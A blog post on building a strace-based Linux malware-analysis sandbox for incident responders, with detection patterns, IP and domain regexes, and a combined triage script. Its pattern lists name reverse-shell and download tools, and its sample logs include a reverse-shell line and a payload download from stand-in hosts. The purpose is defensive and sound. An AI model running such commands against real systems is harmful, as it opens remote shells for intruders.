No Way to Escape: Building the Fundamental Component of a Linux Malware Detection Sandbox from Scratch

Background: Linux malware is relatively rare, so analysts seldom encounter it in an environment during day-to-day operations. This presents a real challenge for beginners attempting malware analysis during cybersecurity incidents. In contrast, analyzing malware in a Windows environment is much easier thanks to the abundance of tools and standalone components available for both automatic and manual behavioral analysis. In this post, I want to share how to build your own analysis machine, so that incident handlers can obtain analysis results when faced with such cases.

Fundamental component: Linux already provides the building blocks for tracing processes: the ptrace system call, and strace, a command-line utility built on top of ptrace that logs the system calls a process makes. Instead of reinventing the wheel, we can leverage these existing tools for our purposes.
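As a minimal sketch of what leveraging strace looks like in practice, the helper below runs a command under strace and saves the trace to a file. The function name `trace_to_file` and the example paths are illustrative assumptions, not part of the original tooling. The options `-f` (follow child processes), `-s` (maximum length of printed strings) and `-o` (output file) are standard strace options.

```shell
#!/usr/bin/env bash
# Hypothetical helper: run a command under strace and save the trace.
# Usage: trace_to_file <logfile> <command> [args...]
trace_to_file() {
    local logfile="$1"
    shift
    if ! command -v strace >/dev/null 2>&1; then
        echo "strace is not installed" >&2
        return 127
    fi
    # -f follows forks/clones, -s 256 keeps longer string arguments,
    # -o writes the trace to the log file instead of stderr.
    strace -f -s 256 -o "$logfile" "$@"
}

# Example (only run this inside an isolated analysis machine):
#   trace_to_file /tmp/sample.trace ./suspicious_binary
```

The function only wraps the invocation; everything that follows in the analysis works on the log file it produces.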

Design: Now that we know what to use as the core of our solution, we need to understand the flow and processes that must be implemented inside our sandbox. First and foremost, it should be able to trace suspicious command executions and C&C (Command and Control) communications. To that end, we can define some detection patterns:

# Syscall patterns of interest (potentially suspicious activity)
SYSCALLS="setsockopt|connect|execve|system|fork|clone|accept|bind|listen|socket|sendto|recvfrom|sendmsg|recvmsg|ptrace|chmod|chown|unlink|rename|mmap|kill|open|write|read|creat|dup|pipe|mount|umount"

# Persistence and reverse shell related command patterns
PERSISTENCE_CMDS="nc|netcat|bash -i|/bin/bash -i|/dev/tcp/|/dev/udp/|curl|wget|python -c.*socket|perl -e.*socket|socat|crontab|cron|systemd|service|rc\.local|atd|init\.d|bash -c|nohup|disown|tmux|screen|ssh|dropbear|reverse shell|startup|autorun"
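To illustrate how such pattern lists behave, here is a small sketch that applies shortened versions of them to a made-up strace log. The sample log lines, the `match_lines` helper and the reduced pattern lists are assumptions for demonstration only. Note that `grep -E` matches substrings, so a pattern like `open` would also match `openat`, and a short pattern like `nc` can match unrelated text.

```shell
#!/usr/bin/env bash
# Shortened pattern lists for illustration (subsets of the lists above).
SYSCALLS="connect|execve|socket|chmod"
PERSISTENCE_CMDS="/dev/tcp/|crontab|wget"

# Hypothetical helper: print the unique trace lines that match a pattern.
# $1 = extended regex, $2 = strace log file
match_lines() {
    grep -E -- "$1" "$2" | sort -u
}

# Made-up sample log, written to a temporary file.
sample_log=$(mktemp)
trap 'rm -f "$sample_log"' EXIT
cat > "$sample_log" <<'EOF'
1001 execve("/bin/bash", ["bash", "-c", "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"], 0x7ffc) = 0
1001 getpid() = 1001
1002 socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
1002 connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("203.0.113.5")}, 16) = 0
EOF

echo "Syscall matches:"
match_lines "$SYSCALLS" "$sample_log"
echo "Persistence / reverse shell matches:"
match_lines "$PERSISTENCE_CMDS" "$sample_log"
```

In this sample, the `getpid` line is ignored by both lists, while the `execve` line is reported by both because it contains a syscall of interest and a `/dev/tcp/` redirection.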

The next challenge is to use regular expressions (regex) to extract all IP addresses and domain names from the strace log. The first pattern below matches IPv4 addresses and the second matches domain names:

'([0-9]{1,3}\.){3}[0-9]{1,3}'
'([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}'
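The two expressions can be tried out on a few sample lines before pointing them at a real trace. The sketch below wraps them in two helpers, `extract_ips` and `extract_domains` (hypothetical names), and runs them against a made-up log. One caveat it makes visible: the domain pattern also matches dotted file names such as `ld.so.cache`, so the output should be treated as a list of candidates rather than confirmed indicators.

```shell
#!/usr/bin/env bash
# Hypothetical helper: print unique IPv4-looking strings found in a log file.
extract_ips() {
    grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' "$1" | sort -u
}

# Hypothetical helper: print unique domain-looking strings, excluding pure IPs.
extract_domains() {
    grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' "$1" \
        | grep -vE '^([0-9]{1,3}\.){3}[0-9]{1,3}$' \
        | sort -u
}

# Made-up sample log, written to a temporary file.
sample_log=$(mktemp)
trap 'rm -f "$sample_log"' EXIT
cat > "$sample_log" <<'EOF'
1002 connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("203.0.113.5")}, 16) = 0
1003 execve("/usr/bin/wget", ["wget", "http://c2.example.com/payload"], 0x7ffd) = 0
1003 openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
EOF

echo "IP addresses:"
extract_ips "$sample_log"
echo "Domain candidates:"
extract_domains "$sample_log"
```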

This result can then be written out as a JSON file.
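One possible way to produce the JSON is sketched below. The helper name `to_json_array` and the `ip_addresses` key layout are assumptions, not necessarily how the linked implementation does it. The helper escapes backslashes and double quotes (strace output contains both) and joins the items without a trailing comma, so the result is a valid JSON array even for empty input.

```shell
#!/usr/bin/env bash
# Hypothetical helper: read lines on stdin, print them as a JSON array of strings.
to_json_array() {
    # Escape backslashes first, then double quotes, then join with commas.
    sed 's/\\/\\\\/g; s/"/\\"/g' \
        | awk 'BEGIN { printf "[" }
               { printf "%s\"%s\"", (NR > 1 ? ", " : ""), $0 }
               END { print "]" }'
}

# Example with made-up addresses: build one field of the report.
ips=$(printf '%s\n' "203.0.113.5" "198.51.100.7" | to_json_array)
printf '{"ip_addresses": %s}\n' "$ips"
```

Control characters are not handled here; strace already prints most of them as escape sequences, but a production version may prefer a dedicated JSON tool.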

Result: Now let's bring everything together in one place to create the core component of the sandbox.


# OUTFILE (path of the strace log) and CMD (command to analyze) must be set by the caller.
SYSCALLS="setsockopt|connect|execve|system|fork|clone|accept|bind|listen|socket|sendto|recvfrom|sendmsg|recvmsg|ptrace|chmod|chown|unlink|rename|mmap|kill|open|write|read|creat|dup|pipe|mount|umount"
PERSISTENCE_CMDS="nc|netcat|bash -i|/bin/bash -i|/dev/tcp/|/dev/udp/|curl|wget|python -c.*socket|perl -e.*socket|socat|crontab|cron|systemd|service|rc\.local|atd|init\.d|bash -c|nohup|disown|tmux|screen|ssh|dropbear|reverse shell|startup|autorun"
PATTERNS="$SYSCALLS|$PERSISTENCE_CMDS"

# Run the command under strace, following child processes, and log network and file syscalls
strace -e trace=%network,%file -f -o "$OUTFILE" bash -c "$CMD"

# Collect unique matches, each formatted as a quoted, comma-terminated JSON array item
suspicious_activity=$(grep -E "$PATTERNS" "$OUTFILE" | sort | uniq | sed 's/"/\\"/g' | awk '{print " \"" $0 "\","}')
ip_addresses=$(grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' "$OUTFILE" | sort | uniq | awk '{print " \"" $0 "\","}')
domains=$(grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' "$OUTFILE" | grep -vE '^([0-9]{1,3}\.){3}[0-9]{1,3}$' | sort | uniq | awk '{print " \"" $0 "\","}')
rev_shells=$(grep -Ei "$PERSISTENCE_CMDS" "$OUTFILE" | sort | uniq | sed 's/"/\\"/g' | awk '{print " \"" $0 "\","}')

And here is the result:

[Three screenshots of the sandbox output]

Now you can deploy it in a Docker container or any other automated setup to deliver the results to the end user. Link to an implementation example:

https://github.com/lisajan-hash/hell_cerberus

Conclusion: For an incident responder, time is critical, especially during the initial triage of malware incidents. Therefore, implementing custom automation tools or utilizing existing vendor solutions should be a top priority for both the incident response (IR) team and IR management. Automation ensures faster and more efficient analysis, helping to minimize the impact of security incidents.